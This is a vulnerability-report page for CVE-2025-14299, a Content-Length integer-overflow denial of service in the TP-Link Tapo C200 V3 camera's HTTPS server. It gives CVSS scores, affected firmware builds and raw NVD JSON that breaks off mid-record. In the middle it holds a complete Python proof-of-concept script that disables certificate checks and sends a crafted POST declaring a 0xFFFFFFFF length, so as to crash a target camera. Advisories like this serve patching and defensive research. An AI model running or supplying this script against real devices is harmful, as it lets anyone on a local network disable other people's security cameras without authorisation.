Security Vulnerability Report
CVE-2025-14299 CVSS 6.5 MEDIUM

CVE-2025-14299

Published: 2025-12-20 01:16:03
Last Modified: 2026-01-08 19:38:07
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

The HTTPS server on Tapo C200 V3 does not properly validate the Content-Length header, which can lead to an integer overflow. An unauthenticated attacker on the same local network segment can send crafted HTTPS requests to trigger excessive memory allocation, causing the device to crash and resulting in denial-of-service (DoS).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.3:build_230228:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.4:build_230424:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.5:build_230717:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.7:build_230920:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.9:build_231019:*:*:*:*:*:* - VULNERABLE
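cpe:2.3:h:tp-link:tapo_c200:3:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry; the record's configuration is an AND, so this appears to mean the firmware builds listed here are affected when running on this hardware, not that V3 hardware is unaffected)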
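TP-Link Tapo C200 V3 (no specific affected firmware versions are listed for this entry; the CPE list above is partial, and the raw JSON record below also marks firmware 1.3.11, 1.3.13, 1.3.14, 1.3.15, 1.4.1, 1.4.2 and 1.4.4 as vulnerable)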

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
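#!/usr/bin/env python3
# CVE-2025-14299 PoC - Tapo C200 V3 Content-Length Integer Overflow DoS
# Target: TP-Link Tapo C200 V3 HTTPS Server
# Note: Use only for authorized security testing
#
# Reviewer notes:
# - The CVE description names neither the request path nor the header value
#   that triggers the fault; "/" and 0xFFFFFFFF below are this listing's own
#   choices. A device that stays up after this request is therefore not shown
#   to be patched; compare its firmware build against the affected list.
# - The CVSS vector on the page is AV:A, i.e. the service is reachable only
#   from the camera's own network segment, so isolating cameras on a separate
#   segment limits which hosts can reach it.
import socket
import ssl
import sys


def create_ssl_context():
    """Build a TLS client context that accepts any server certificate.

    Hostname checking and certificate verification are both switched off, so
    the peer is not authenticated.
    NOTE(review): presumably needed because the camera presents a
    self-signed certificate -- confirm.
    """
    context = ssl.create_default_context()
    # check_hostname has to be cleared first: ssl refuses CERT_NONE while
    # hostname checking is still enabled.
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    return context


def send_malicious_request(target_ip, target_port=443):
    """Send one POST that declares Content-Length 0xFFFFFFFF and has no body.

    Args:
        target_ip: Address of the device; also used for the Host header and
            passed as server_hostname to the TLS wrapper.
        target_port: TCP port of the HTTPS service (default 443).

    Returns:
        True when the request was written to the TLS socket, False when
        connecting, the handshake or the write raised. True only means the
        bytes were handed off: the response is never read, so the return
        value says nothing about the state of the device.
    """
    # 0xFFFFFFFF == 4294967295, the largest unsigned 32-bit value.
    # NOTE(review): the CVE text says only that Content-Length is not
    # properly validated and can overflow an integer; where the length
    # arithmetic wraps is not stated on the page.
    malicious_content_length = 0xFFFFFFFF

    # Headers only: the declared length is never backed by body bytes.
    http_request = (
        "POST / HTTP/1.1\r\n"
        f"Host: {target_ip}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {malicious_content_length}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    try:
        context = create_ssl_context()
        with socket.create_connection(
            (target_ip, target_port), timeout=10
        ) as sock, context.wrap_socket(
            sock, server_hostname=target_ip
        ) as ssock:
            print(f"[*] Sending malicious request to {target_ip}:{target_port}")
            print(f"[*] Content-Length: {malicious_content_length}")
            ssock.send(http_request.encode())
            print("[+] Request sent successfully")
            print("[*] Target should crash or become unresponsive")
    except Exception as e:
        # Deliberately broad: every failure (refused connection, timeout,
        # TLS error, out-of-range port) is reported and mapped to False.
        print(f"[-] Error: {e}")
        return False
    return True


def parse_args(argv):
    """Return ``(target, port)`` taken from *argv*, or None if unusable.

    Args:
        argv: Argument vector in ``sys.argv`` layout (program name first).

    Returns:
        A ``(target, port)`` tuple, with port defaulting to 443, or None
        when the target is missing or the port is not an integer.
    """
    if len(argv) < 2:
        return None
    port = 443
    if len(argv) > 2:
        try:
            port = int(argv[2])
        except ValueError:
            # A non-numeric port is a usage error, not a traceback.
            return None
    return argv[1], port


if __name__ == "__main__":
    parsed = parse_args(sys.argv)
    if parsed is None:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target, port = parsed
    print("=" * 60)
    print("CVE-2025-14299 PoC - Tapo C200 V3 DoS")
    print("=" * 60)
    # Surface a failed send in the exit status instead of discarding it.
    sys.exit(0 if send_malicious_request(target, port) else 1)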

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14299", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-12-20T01:16:02.670", "lastModified": "2026-01-08T19:38:06.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTTPS server on Tapo C200 V3 does not properly validate the Content-Length header, which can lead to an integer overflow. An unauthenticated attacker on the same local network segment can send crafted HTTPS requests to trigger excessive memory allocation, causing the device to crash and resulting in denial-of-service (DoS)."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.3:build_230228:*:*:*:*:*:*", "matchCriteriaId": "CABD8DE6-9904-499D-919F-9DBD42BE6762"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.4:build_230424:*:*:*:*:*:*", "matchCriteriaId": "254031B5-7CC7-4B9D-970B-FAA6EBC3EAFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.5:build_230717:*:*:*:*:*:*", "matchCriteriaId": "9D61B481-8262-44D4-9A1D-9967AB1805DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.7:build_230920:*:*:*:*:*:*", "matchCriteriaId": "50D2F368-F8C8-41E1-9360-8CDF9F89E566"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.9:build_231019:*:*:*:*:*:*", "matchCriteriaId": "EF80958C-4274-4DEA-9730-176E3E6F21F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.11:build_231115:*:*:*:*:*:*", "matchCriteriaId": "7AA1B7FA-D418-46B2-A530-BF67E550E38F"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.13:build_240327:*:*:*:*:*:*", "matchCriteriaId": "DC4382B5-C7EC-4B98-AF28-8D08D0771133"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.14:build_240513:*:*:*:*:*:*", "matchCriteriaId": "1FCE1F5E-E84B-4CF4-B8A4-7A3448A0D127"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.3.15:build_240715:*:*:*:*:*:*", "matchCriteriaId": "C05AC5C2-5BB7-499A-AE2B-414103317D47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.1:build_241212:*:*:*:*:*:*", "matchCriteriaId": "C1ED28D6-9441-440A-81D8-EB539D50BB56"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.2:build_250313:*:*:*:*:*:*", "matchCriteriaId": "51E28752-8B46-48CD-86B5-437449AED7C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c200_firmware:1.4.4:build_250922:*:*:*:*:*:*", "matchCriteriaId": "ECBC265E-2AA6-471E-A7BE-8F35DDA28645"}]}, {"operator": "OR", "negate": fals ... (truncated)